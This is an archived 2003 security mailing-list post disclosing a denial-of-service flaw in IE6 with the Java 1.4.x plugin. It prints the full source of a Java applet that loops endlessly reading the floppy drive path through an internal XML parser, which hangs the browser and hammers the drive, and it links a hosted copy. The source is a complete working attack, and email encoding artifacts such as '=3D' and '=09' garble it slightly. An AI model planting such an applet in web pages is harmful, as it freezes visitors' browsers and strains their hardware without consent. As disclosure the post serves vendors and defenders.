TUCoPS :: Browsers :: bt1311.txt

IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

be prepared that your IE6 will be blocked if you
run the java plugin (any 1.4.x including 1.4.2_02)
with the following applet:

http://www.illegalaccess.org/exploits/java/applet/MyFloppySucks.html

Of course this only work when you have a drive a:.
Some may already know this applet but I found a way to
increase the frequency the floppy is accessed.
This is almost like the good old stepper motor
demo on the C1541 commodore drive, where the
floppy played a christmas song.

Sun has been informed about this issue over a week ago.
Since then I got no answer. Maybe they have no
floppy drives :-(

Here is the source:
import java.awt.Label;

public class MyFloppySucks extends java.applet.Applet {
=09private Label m_labVersionVendor;
   public MyFloppySucks () //constructor
   {
     m_labVersionVendor =3D new Label ("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org" +" / Java Version: " +
                                    System.getProperty("java.version")+
                           " from "+System.getProperty("java.vendor"));
     this.add(m_labVersionVendor);
   }
   public void paint(java.awt.Graphics g) {
        while (1=3D=3D1)
=09   try {

org.apache.crimson.tree.XmlDocument.createXmlDocument("file:///a:/",false);
=09}
=09catch (Exception e) {
=09=09System.out.println("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org");
=09}
   }
}


Marc



- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Sch=F6nefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE/lZ5PqCaQvrKNUNQRAle9AJ9DlTr9csO5s98FPNqlrOKDzHkEEwCfboj7
/AD6mnvFiHUendHDNlT+6js=3D
=3DN/UX
-----END PGP SIGNATURE-----

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH